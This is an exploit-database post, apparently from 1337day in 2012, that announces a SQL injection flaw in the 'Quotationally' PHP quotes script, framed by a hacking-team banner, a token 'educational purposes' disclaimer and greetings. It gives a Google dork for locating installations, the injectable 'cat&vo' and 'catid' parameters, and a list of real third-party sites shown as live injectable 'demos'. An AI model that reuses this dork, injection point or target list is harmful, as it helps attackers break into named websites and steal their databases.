Quotationally SQL Injection Vulnerability

2012-09-21T00:00:00
ID 1337DAY-ID-19441
Type zdt
Reporter TUNISIAN CYBER
Modified 2012-09-21T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm TUNISIAN CYBER member from Inj3ct0r Team           1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+] Author: TUNISIAN CYBER
[+] Home: 1337day.com Inj3ct0r Exploit DataBase
[+] Exploit Title:  Quotationally SQL Injection Vulnerability
[+] Date: 21-09-2012
[+] Category: WebApp
[+] Google Dork: intext:"Powered by Quotationally" index.php?cat
[+] Tested on: Windows 7 Professionnel / MAC Os
[+] Vendor: http://inspirationally.org/

####################################################################################


 #################################################################################
 |||                         ~~ Use It At Your Own Risk ~~                     |||
 |||                    It's For Educational Purpos Only                       |||
 |||                    I'm not Responsible For Any Damage                     |||
 #################################################################################

Example:

127.0.0.1/index?cat&vo=[SQLi]
#################################################################################

Demos:
http://www.bellaandedward.com/lists/index.php?cat&vo=46'
http://vanessa-hudgens.us/qu/index.php?cat&catid=4'
http://kyoudai.net/turnaround/index.php?cat&catid=23'
http://chris-colfer.com/quotes/index.php?cat&catid=6'
http://www.harsh-light.com/quotationally/index.php?cat&catid=11'
http://www.marius-deromanus.net/quotes/index.php?cat&catid=1'
http://mushy.yekram.com/index.php?cat&vo=10'

More in Google =)

لا اله الا الله محمدا عبده ورسوله
وأنزل عقابا أليما عل كل من يتطاول على الإسلام والمسلمين
رحم الله كل من توفى

./3nD
########################################################################################
Greets to: TN H4CK3RZ( Badi - xMax-tn - Silent_hill - pipo issam - anas laribi - xtech set) , r00tw0rm members and Inj3ct0r Team
###########################################################################################



#  0day.today [2018-03-14]  #